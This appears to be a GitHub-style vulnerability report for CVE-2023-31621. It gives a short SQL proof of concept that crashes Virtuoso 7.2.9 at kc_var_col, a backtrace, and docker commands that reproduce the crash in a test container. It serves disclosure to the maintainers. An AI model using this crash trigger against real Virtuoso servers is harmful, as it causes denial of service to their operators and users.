Headline
CVE-2023-31621: virtuoso 7.2.9 crashed at kc_var_col · Issue #1130 · openlink/virtuoso-opensource
An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE brin_test(a INTEGER NOT NULL); INSERT INTO brin_test (a) VALUES(5); INSERT INTO brin_test (a) VALUES(5); ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ; UPDATE brin_test SET a = a + 1 WHERE a = 5;
backtrace:
#0 0x5cfed5 (kc_var_col+0x155) #1 0x5f6cb6 (page_copy_col+0x666) #2 0x5d6e62 (page_row_bm+0x782) #3 0x5db6b0 (page_apply_1+0xb90) #4 0x5dd8d9 (page_apply+0x119) #5 0x86b517 (upd_refit_row+0x127) #6 0x86ce54 (update_node_run_1+0xdf4) #7 0x821736 (update_node_vec_run+0x836) #8 0x86eaf2 (update_node_input+0x2b2) #9 0x7ac43e (qn_input+0x3ce) #10 0x7acb6f (qn_ts_send_output+0x23f) #11 0x7b247e (table_source_input+0x16ee) #12 0x7ac43e (qn_input+0x3ce) #13 0x7ac8a6 (qn_send_output+0x236) #14 0x81e26d (set_ctr_vec_input+0x94d) #15 0x7ac43e (qn_input+0x3ce) #16 0x7bee59 (qr_dml_array_exec+0x839) #17 0x7cb872 (sf_sql_execute+0x15d2) #18 0x7cbf4e (sf_sql_execute_w+0x17e) #19 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #20 0xe1f01c (future_wrapper+0x3fc) #21 0xe2691e (_thread_boot+0x11e) #22 0x7f2e9644f609 (start_thread+0xd9) #23 0x7f2e9621f133 (clone+0x43)
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”